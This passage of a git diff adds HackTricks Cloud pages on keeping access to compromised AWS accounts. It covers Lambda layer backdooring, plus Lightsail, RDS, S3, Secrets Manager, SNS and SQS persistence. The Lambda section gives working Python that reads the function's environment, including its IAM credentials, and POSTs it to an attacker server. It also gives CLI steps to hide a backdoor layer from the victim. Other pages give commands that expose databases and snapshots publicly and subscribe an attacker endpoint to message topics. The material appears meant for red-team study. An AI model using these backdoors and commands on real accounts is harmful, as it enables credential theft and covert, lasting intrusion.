+
+Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+
+### Python load path
+
+The load path that Python will use in lambda is the following:
+
+```
+['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
+```
+
+Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`**
+
+{% hint style="danger" %}
+If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation.
+{% endhint %}
+
+Therefore, the requisites are:
+
+* **Check libraries** that are **loaded** by the victims code
+* Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library.
+
+### Preloaded libraries
+
+{% hint style="warning" %}
+When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\
+In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed.
+{% endhint %}
+
+With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda:
+
+```python
+import sys
+
+def lambda_handler(event, context):
+    return {
+        'statusCode': 200,
+        'body': str(sys.modules.keys())
+    }
+```
+
+And this is the **list** (check that libraries like `os` or `json` are already there)
+
+```
+'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
+```
+
+And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
+
+### Lambda Layer Backdooring
+
+In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**.
+
+For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\
+Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\
+This file must:
+
+* Execute our payload
+* Load the original csv library
+
+We can do both with:
+
+```python
+import sys
+from urllib import request
+
+with open("/proc/self/environ", "rb") as file:
+    url= "https://attacker13123344.com/" #Change this to your server
+    req = request.Request(url, data=file.read(), method="POST")
+    response = request.urlopen(req)
+
+# Remove backdoor directory from path to load original library
+del_path_dir = "/".join(__file__.split("/")[:-2])
+sys.path.remove(del_path_dir)
+
+# Remove backdoored loaded library from sys.modules
+del sys.modules[__file__.split("/")[-2]]
+
+# Load original library
+import csv as _csv
+
+sys.modules["csv"] = _csv
+```
+
+Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer.
+
+You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
+
+The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated:
+
+{% content-ref url="../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %}
+[aws-warm-lambda-persistence.md](../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
+{% endcontent-ref %}
+
+### External Layers
+
+Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\
+Also note that the **max number of layers a lambda can have is 5**.
+
+Therefore, in order to improve the versatility of this technique an attacker could:
+
+* Backdoor an existing layer of the user (nothing is external)
+* **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**.
+  * The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda)
+  * The victim **won't see external layers** used with **`aws lambda list-layers`**
+
+{% code overflow="wrap" %}
+```bash
+# Upload backdoor layer
+aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
+
+# Give everyone access to the lambda layer
+## Put the account number in --principal to give access only to an account
+aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
+
+## Add layer to victims Lambda
+
+# Remove permissions
+aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
new file mode 100644
index 0000000000..77290eacb5
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
@@ -0,0 +1,59 @@
+# AWS - Lightsail Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lightsail
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-lightsail-enum.md" %}
+[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md)
+{% endcontent-ref %}
+
+### Download Instance SSH keys & DB passwords
+
+They won't be changed probably so just having them is a good option for persistence
+
+### Backdoor Instances
+
+An attacker could get access to the instances and backdoor them:
+
+* Using a traditional **rootkit** for example
+* Adding a new **public SSH key**
+* Expose a port with port knocking with a backdoor
+
+### DNS persistence
+
+If domains are configured:
+
+* Create a subdomain pointing your IP so you will have a **subdomain takeover**
+* Create **SPF** record allowing you to send **emails** from the domain
+* Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
new file mode 100644
index 0000000000..6416216621
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
@@ -0,0 +1,61 @@
+# AWS - RDS Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## RDS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %}
+[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md)
+{% endcontent-ref %}
+
+### Make instance publicly accessible: `rds:ModifyDBInstance`
+
+An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
+
+{% code overflow="wrap" %}
+```bash
+aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
+```
+{% endcode %}
+
+### Create an admin user inside the DB
+
+An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
+
+### Make snapshot public
+
+{% code overflow="wrap" %}
+```bash
+aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
new file mode 100644
index 0000000000..c821dbd6a8
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -0,0 +1,51 @@
+# AWS - S3 Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## S3
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %}
+[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md)
+{% endcontent-ref %}
+
+### KMS Client-Side Encryption
+
+When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
+
+<figure><img src="../../../.gitbook/assets/image (226).png" alt=""><figcaption></figcaption></figure>
+
+Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
+
+### Using S3 ACLs
+
+Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
new file mode 100644
index 0000000000..9349605bc7
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
@@ -0,0 +1,79 @@
+# AWS - Secrets Manager Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Secrets Manager
+
+For more info check:
+
+{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %}
+[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md)
+{% endcontent-ref %}
+
+### Via Resource Policies
+
+It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**.
+
+### Via Secrets Rotate Lambda
+
+To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself.
+
+This is how lambda code for such action could look like:
+
+```python
+import boto3
+
+def rotate_secrets(event, context):
+    # Create a Secrets Manager client
+    client = boto3.client('secretsmanager')
+
+    # Retrieve the current secret value
+    secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
+
+    # Rotate the secret by updating its value
+    new_secret_value = rotate_secret(secret_value)
+    client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
+
+def rotate_secret(secret_value):
+    # Perform the rotation logic here, e.g., generate a new password
+
+    # Example: Generate a new password
+    new_secret_value = generate_password()
+
+    return new_secret_value
+
+def generate_password():
+    # Example: Generate a random password using the secrets module
+    import secrets
+    import string
+    password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
+    return password
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
new file mode 100644
index 0000000000..cb0b70d826
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
@@ -0,0 +1,107 @@
+# AWS - SNS Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SNS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-sns-enum.md" %}
+[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
+{% endcontent-ref %}
+
+### Persistence
+
+When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
+The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
+
+```json
+{
+  "Version": "2008-10-17",
+  "Id": "__default_policy_ID",
+  "Statement": [
+    {
+      "Sid": "__default_statement_ID",
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "*"
+      },
+      "Action": [
+        "SNS:Publish",
+        "SNS:RemovePermission",
+        "SNS:SetTopicAttributes",
+        "SNS:DeleteTopic",
+        "SNS:ListSubscriptionsByTopic",
+        "SNS:GetTopicAttributes",
+        "SNS:AddPermission",
+        "SNS:Subscribe"
+      ],
+      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
+      "Condition": {
+        "StringEquals": {
+          "AWS:SourceOwner": "318142138553"
+        }
+      }
+    },
+    {
+      "Sid": "__console_pub_0",
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "*"
+      },
+      "Action": "SNS:Publish",
+      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+    },
+    {
+      "Sid": "__console_sub_0",
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "*"
+      },
+      "Action": "SNS:Subscribe",
+      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+    }
+  ]
+}
+```
+
+### Create Subscribers
+
+To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
+
+Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
+
+```bash
+aws sns subscribe --region <region> \
+    --protocol http \
+    --notification-endpoint http://<attacker>/ \
+    --topic-arn <arn>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
new file mode 100644
index 0000000000..88c12a5495
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
@@ -0,0 +1,68 @@
+# AWS - SQS Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SQS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %}
+[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md)
+{% endcontent-ref %}
+
+### Using resource policy
+
+In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
+The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**:
+
+```json
+{
+  "Version": "2008-10-17",
+  "Id": "__default_policy_ID",
+  "Statement": [
+    {
+      "Sid": "__owner_statement",
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "*"
+      },
+      "Action": [
+        "SQS:*"
+      ],
+      "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
+    }
+  ]
+}
+```
+
+{% hint style="info" %}
+You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
